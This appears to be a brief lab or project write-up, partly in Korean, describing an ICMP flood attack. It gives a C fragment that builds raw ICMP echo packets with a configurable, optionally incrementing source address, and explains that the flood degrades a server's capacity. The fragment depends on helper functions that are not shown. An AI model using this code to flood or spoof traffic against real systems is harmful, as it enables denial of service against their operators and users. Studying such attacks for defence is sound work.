Wireshark Capture
210301_icmp.pcapng
Code Implementation
struct icmp *p;
char buffer[sizeof(struct icmp)];
memset(buffer, 0x00, sizeof(struct icmp));
struct iphdr ipv4_h;
ipv4_h = prepare_empty_ipv4();
ipv4_h = ipv4_set_protocol(ipv4_h, IPPROTO_ICMP);
ipv4_h = ipv4_set_saddr(ipv4_h, inet_addr(icmp_src_ip));
//modify icmp_src_ip, increment 1.
//next_ip_addr(icmp_src_ip, 1);
ipv4_h = ipv4_set_daddr(ipv4_h, inet_addr(icmp_dest_ip));
p = (struct icmp*) buffer;
p->icmp_type = ICMP_ECHO;
p->icmp_code = 0;
p->icmp_cksum = 0;
p->icmp_seq = htons(icmp_produced);
p->icmp_id = getpid();
p->icmp_cksum = in_cksum((u_short*) p, sizeof(struct icmp));
ipv4_h = ipv4_add_size(ipv4_h, sizeof(struct icmp));
char *packet = packet_assemble(ipv4_h, p, sizeof(struct icmp));
send_packet(sock, ipv4_h, packet, g_icmp_now_port);
How it works
- ICMP 패킷 (흔히 ping)을 다수 발생시켜 서버측이 request를 처리하는데 자원을 할당하게 만들어 서버의 처리능력을 저하시키는 공격방법.